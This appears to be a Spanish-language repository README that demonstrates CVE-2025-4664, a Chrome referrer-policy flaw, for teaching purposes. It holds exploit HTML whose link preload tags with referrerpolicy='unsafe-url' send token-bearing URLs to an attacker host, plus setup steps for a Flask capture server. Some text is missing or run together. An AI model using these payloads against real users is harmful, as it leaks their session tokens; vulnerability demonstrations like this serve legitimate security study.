
Demostración educativa de CVE-2025-4664, una vulnerabilidad del cargador de Chrome que permite la filtración de datos entre orígenes mediante la manipulación de la política de referer. Incluye una página HTML de la víctima y un servidor Flask del atacante para una simulación práctica de explotación.
La vulnerabilidad CVE-2025-4664 es un fallo de seguridad de alta gravedad identificado en el componente Loader de Google Chrome, presente en versiones anteriores a la 136.0.7103.113. Este problema permite a un atacante remoto filtrar datos de origen cruzado mediante una página HTML especialmente diseñada, lo que puede comprometer información sensible como tokens de sesión o credenciales de autenticación.
El fallo radica en una implementación inadecuada de las políticas de seguridad en el componente Loader de Chrome. Específicamente, Chrome interpreta la directiva referrer-policy dentro del encabezado HTTP Link en solicitudes de subrecursos (como imágenes o scripts), incluso cuando otros navegadores no lo hacen. Un atacante puede aprovechar esto configurando una política menos restrictiva, como unsafe-url, lo que provoca que Chrome filtre URLs completas, incluyendo parámetros sensibles, a dominios controlados por el atacante.
Esta vulnerabilidad ha sido explotada activamente en entornos reales, lo que llevó a la Agencia de Ciberseguridad y Seguridad de Infraestructura de EE.UU. (CISA) a incluirla en su Catálogo de Vulnerabilidades Conocidas y Explotadas (KEV). CISA ha establecido el 5 de junio de 2025 como fecha límite para que las agencias federales apliquen las correcciones correspondientes.
Google ha lanzado actualizaciones para corregir esta vulnerabilidad en las siguientes versiones:
Se recomienda encarecidamente a todos los usuarios actualizar su navegador Chrome a la versión más reciente disponible. Para verificar y aplicar la actualización:
Además, usuarios de navegadores basados en Chromium, como Microsoft Edge, Brave, Opera y Vivaldi, deben estar atentos a las actualizaciones correspondientes, ya que podrían verse afectados por esta vulnerabilidad.
Mantener el navegador actualizado es esencial para protegerse contra amenazas de seguridad activas y salvaguardar la información personal.
La vulnerabilidad CVE-2025-4664 se explota manipulando la forma en que Google Chrome maneja la política de referencia (referrer-policy) al cargar subrecursos (como imágenes, scripts, etc.) desde enlaces HTML.
🌐 Creación de un sitio malicioso:
El atacante crea un sitio web que incluye un enlace HTML como este en su cabecera HTTP:
<link rel="preload" as="image" href="https://victima.com/imagen.jpg" referrerpolicy="unsafe-url">
🔧 Manipulación de referrer-policy: En la mayoría de los navegadores, este referrerpolicy en la etiqueta no se aplica para el recurso cargado. Sin embargo, Chrome sí lo aplica, lo que es el núcleo del problema.
📤 Filtrado del Referer: Cuando el navegador de la víctima (Chrome) carga el recurso desde victima.com, envía toda la URL del sitio de origen como cabecera Referer, lo que puede incluir:
<link rel="preload" as="image" href="https://atacante.com/captura.jpg" referrerpolicy="unsafe-url">
Cuando la víctima accede a este recurso, Chrome envía su URL completa como Referer al servidor del atacante.
1- El atacante envía a la víctima un enlace a:
https://atacante.com/pagina-maliciosa.html
<link rel="preload" as="image" href="https://victima.com/perfil?token=ABC123" referrerpolicy="unsafe-url">
Referer: https://victima.com/perfil?token=ABC123
al dominio atacante, exponiendo el token.

index.html — Archivo víctimaEste archivo simula la víctima del ataque, es una demo en HTML simplificada para mostrar cómo se puede explotar la vulnerabilidad CVE-2025-4664 usando una etiqueta maliciosa:
<!DOCTYPE html>
<html lang="es">
<head>
<meta charset="UTF-8">
<title>Demo CVE-2025-4664</title>
<!-- Este recurso apunta a un sitio de la víctima con información sensible en la URL -->
<link rel="preload" as="image"
href="https://victima.com/perfil?token=ABC123"
referrerpolicy="unsafe-url">
</head>
<body>
<h1>Demostración de la vulnerabilidad CVE-2025-4664</h1>
<p>Si estás usando una versión vulnerable de Chrome, el navegador enviará el <strong>Referer completo</strong> a la URL de arriba.</p>
</body>
</html>
servidor_atacante.py — Archivo atacanteCon este script es posible automatizar el ataque para capturar los Referer usando un pequeño servidor en Python. Aquí tienes un ejemplo utilizando Flask para simular el servidor del atacante que recibe los datos:
index.html.pip install flask
python servidor_atacante.py
<link rel="preload" as="image"
href="http://<tu_IP>:8080/captura.jpg"
referrerpolicy="unsafe-url">
Reemplaza <tu_IP> por la IP pública o local del servidor que ejecuta el script.
Abre una terminal (PowerShell o CMD).
Navega a la carpeta del archivo:
cd "C:\Users\Sebas\Desktop\servidor_atacante"
python servidor_atacante.py
* Running on http://127.0.0.1:8080
* Running on http://192.168.1.35:8080
En esa misma carpeta (C:\Users\Sebas\Desktop\servidor_atacante), crea un archivo llamado index.html con este contenido:
<!DOCTYPE html>
<html lang="es">
<head>
<meta charset="UTF-8">
<title>Demo CVE-2025-4664</title>
<!-- Simula el ataque -->
<link rel="preload" as="image"
href="http://192.168.1.35:8080/captura.jpg"
referrerpolicy="unsafe-url">
</head>
<body>
<h1>Simulación CVE-2025-4664</h1>
<p>Este HTML intenta filtrar la URL completa (incluyendo el token) al atacante.</p>
</body>
</html>
✅ Importante: Asegúrate de que la IP (192.168.1.35) coincida con la que muestra Flask como IP local. Si es diferente, cámbiala en el HTML.
Abre Chrome.
En la barra de direcciones, escribe:
file:///C:/[Carpeta destino]/servidor_atacante/index.html?token=ABC123
Presiona Enter.
📥 Ver el resultado en el servidor En la consola de Flask deberías ver algo como:
[+] Referer recibido: file:///C:/[Carpeta destino]/servidor_atacante/index.html?token=ABC123
[Carpeta destino]: Modificar este parametro por donde tengamos guardado el archivo.
🎯 ¡Eso significa que el navegador envió el Referer completo al atacante!
Explicación elaborada por Sebastian Peinador para propósitos didácticos y de investigación en ciberseguridad ofensiva.
Este material se distribuye bajo la licencia MIT.
Si te resulta útil, ¡no olvides darle ⭐ al repo o compartirlo!